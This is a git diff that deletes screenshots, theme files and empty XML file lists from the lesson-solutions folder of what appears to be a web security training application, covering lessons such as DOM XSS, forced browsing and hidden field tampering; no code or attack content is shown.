diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db b/src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db
deleted file mode 100644
index 550da4fb2..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/image001.jpg b/src/main/webapp/lesson_solutions/DOMXSS_files/image001.jpg
deleted file mode 100644
index c62bcbd94..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/image002.jpg b/src/main/webapp/lesson_solutions/DOMXSS_files/image002.jpg
deleted file mode 100644
index 77ce23c41..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/image003.jpg b/src/main/webapp/lesson_solutions/DOMXSS_files/image003.jpg
deleted file mode 100644
index ce288a551..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/image003.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/image004.jpg b/src/main/webapp/lesson_solutions/DOMXSS_files/image004.jpg
deleted file mode 100644
index 6ae8cdfda..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/DOS_Login_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/DOS_Login_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
- - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/filelist.xml b/src/main/webapp/lesson_solutions/DOS_Login_files/filelist.xml
deleted file mode 100644
index 065d671e4..000000000
--- a/src/main/webapp/lesson_solutions/DOS_Login_files/filelist.xml
+++ /dev/null
@@ -1,10 +0,0 @@
- - - - - - - - - - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/image001.png b/src/main/webapp/lesson_solutions/DOS_Login_files/image001.png
deleted file mode 100644
index dc2669fe2..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/image002.jpg b/src/main/webapp/lesson_solutions/DOS_Login_files/image002.jpg
deleted file mode 100644
index 6f5c75387..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/image003.png b/src/main/webapp/lesson_solutions/DOS_Login_files/image003.png
deleted file mode 100644
index 45396104d..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/image004.jpg b/src/main/webapp/lesson_solutions/DOS_Login_files/image004.jpg
deleted file mode 100644
index 372cdca56..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/themedata.thmx b/src/main/webapp/lesson_solutions/DOS_Login_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
- - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/filelist.xml b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/filelist.xml
deleted file mode 100644
index bdb35f85a..000000000
--- a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
- - - - - - - - - - - - - - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image001.png b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image001.png
deleted file mode 100644
index 44e09369d..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image003.png b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image003.png
deleted file mode 100644
index 1cf2cc012..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image005.png b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image005.png
deleted file mode 100644
index 9f5747a75..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image007.png b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image007.png
deleted file mode 100644
index 0845266c4..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image009.jpg b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image009.jpg
deleted file mode 100644
index c871b0225..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image010.jpg b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image010.jpg
deleted file mode 100644
index 74cec6054..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image011.jpg b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image011.jpg
deleted file mode 100644
index 29defb100..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image012.jpg b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image012.jpg
deleted file mode 100644
index 09d5ac828..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/themedata.thmx b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/filelist.xml b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/filelist.xml
deleted file mode 100644
index 6616ecc49..000000000
--- a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image001.png b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image001.png
deleted file mode 100644
index c9047d693..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image002.jpg b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image002.jpg
deleted file mode 100644
index 101e688a4..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image003.png b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image003.png
deleted file mode 100644
index 569dc0098..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image004.jpg b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image004.jpg
deleted file mode 100644
index 6fe272fa4..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image005.png b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image005.png
deleted file mode 100644
index f2945e2b0..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image006.jpg b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image006.jpg
deleted file mode 100644
index 7ec274b62..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image007.png b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image007.png
deleted file mode 100644
index a001e7963..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image008.jpg b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image008.jpg
deleted file mode 100644
index 672f7af05..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/themedata.thmx b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/ForgotPassword_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/ForgotPassword_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/filelist.xml b/src/main/webapp/lesson_solutions/ForgotPassword_files/filelist.xml
deleted file mode 100644
index ec8ce5b70..000000000
--- a/src/main/webapp/lesson_solutions/ForgotPassword_files/filelist.xml
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image001.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image001.png
deleted file mode 100644
index 3e10c76d3..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image003.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image003.png
deleted file mode 100644
index 11a7001dc..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image005.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image005.png
deleted file mode 100644
index 033f2e8c8..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image007.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image007.png
deleted file mode 100644
index 664c24a06..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image009.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image009.png
deleted file mode 100644
index e0e2ffb7c..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image011.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image011.png
deleted file mode 100644
index 4542c5240..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image013.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image013.png
deleted file mode 100644
index f72055656..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image015.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image015.jpg
deleted file mode 100644
index 1f670723b..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image016.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image016.jpg
deleted file mode 100644
index 6f8105ce7..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image017.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image017.jpg
deleted file mode 100644
index 76540dad8..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image018.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image018.jpg
deleted file mode 100644
index 76c23e5ea..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image019.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image019.jpg
deleted file mode 100644
index fc38db81d..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image020.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image020.jpg
deleted file mode 100644
index c5a2f719f..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image021.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image021.jpg
deleted file mode 100644
index 5798c0713..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/themedata.thmx b/src/main/webapp/lesson_solutions/ForgotPassword_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db
deleted file mode 100644
index ccd50130d..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/filelist.xml b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/filelist.xml
deleted file mode 100644
index a94e9430b..000000000
--- a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image001.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image001.png
deleted file mode 100644
index 3757d471d..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image003.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image003.png
deleted file mode 100644
index e3ba2d5cd..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image005.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image005.png
deleted file mode 100644
index 1f0d5ebef..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image007.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image007.png
deleted file mode 100644
index a715a8db2..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image009.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image009.png
deleted file mode 100644
index 2914f15ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image011.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image011.jpg
deleted file mode 100644
index 06d8b5434..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image012.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image012.jpg
deleted file mode 100644
index 3be37d0cf..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image013.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image013.jpg
deleted file mode 100644
index 7feef4395..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image014.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image014.jpg
deleted file mode 100644
index 6bbe14316..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image015.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image015.jpg
deleted file mode 100644
index 02de6c5eb..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/themedata.thmx b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HtmlClues_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HtmlClues_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/filelist.xml b/src/main/webapp/lesson_solutions/HtmlClues_files/filelist.xml
deleted file mode 100644
index b8f56a1ec..000000000
--- a/src/main/webapp/lesson_solutions/HtmlClues_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image001.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image001.png
deleted file mode 100644
index 16a985f95..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image003.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image003.png
deleted file mode 100644
index 6c3b652b2..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image005.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image005.png
deleted file mode 100644
index baccb3c43..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image007.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image007.png
deleted file mode 100644
index 7fe1df7d1..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image009.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image009.png
deleted file mode 100644
index 4e0f0026e..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image011.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image011.jpg
deleted file mode 100644
index 5c887a646..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image012.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image012.jpg
deleted file mode 100644
index 80456d498..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image013.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image013.jpg
deleted file mode 100644
index 38b875113..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image014.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image014.jpg
deleted file mode 100644
index 3a8f380ac..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image015.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image015.jpg
deleted file mode 100644
index a9d131b57..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/themedata.thmx b/src/main/webapp/lesson_solutions/HtmlClues_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HttpBasics_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HttpBasics_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/filelist.xml b/src/main/webapp/lesson_solutions/HttpBasics_files/filelist.xml
deleted file mode 100644
index 2d81880c2..000000000
--- a/src/main/webapp/lesson_solutions/HttpBasics_files/filelist.xml
+++ /dev/null
@@ -1,10 +0,0 @@
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/image001.png b/src/main/webapp/lesson_solutions/HttpBasics_files/image001.png
deleted file mode 100644
index 783a404ed..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/image003.png b/src/main/webapp/lesson_solutions/HttpBasics_files/image003.png
deleted file mode 100644
index 7d0a0830c..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/image005.jpg b/src/main/webapp/lesson_solutions/HttpBasics_files/image005.jpg
deleted file mode 100644
index 7b9b508a5..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/image005.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/image006.jpg b/src/main/webapp/lesson_solutions/HttpBasics_files/image006.jpg
deleted file mode 100644
index cb6599a1f..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/themedata.thmx b/src/main/webapp/lesson_solutions/HttpBasics_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab1.jpg b/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab1.jpg
deleted file mode 100644
index 5abdf6f73..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab1.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab2.jpg b/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab2.jpg
deleted file mode 100644
index 982f3f7bc..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab2.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HttpOnly_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HttpOnly_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/filelist.xml b/src/main/webapp/lesson_solutions/HttpOnly_files/filelist.xml
deleted file mode 100644
index b6972bfed..000000000
--- a/src/main/webapp/lesson_solutions/HttpOnly_files/filelist.xml
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image001.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image001.png
deleted file mode 100644
index 169190729..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image003.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image003.png
deleted file mode 100644
index 597cc80eb..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image005.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image005.png
deleted file mode 100644
index 24e98dab8..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image007.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image007.png
deleted file mode 100644
index 6b5f8cb64..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image009.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image009.png
deleted file mode 100644
index 443fc7029..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image011.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image011.png
deleted file mode 100644
index a378ec244..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image013.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image013.png
deleted file mode 100644
index 98535fdfe..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image015.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image015.jpg
deleted file mode 100644
index efbe77300..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image016.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image016.jpg
deleted file mode 100644
index 195c2529b..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image017.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image017.jpg
deleted file mode 100644
index 91d8d9c6d..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image018.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image018.jpg
deleted file mode 100644
index adc7a901e..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image018.jpg and /dev/null differ
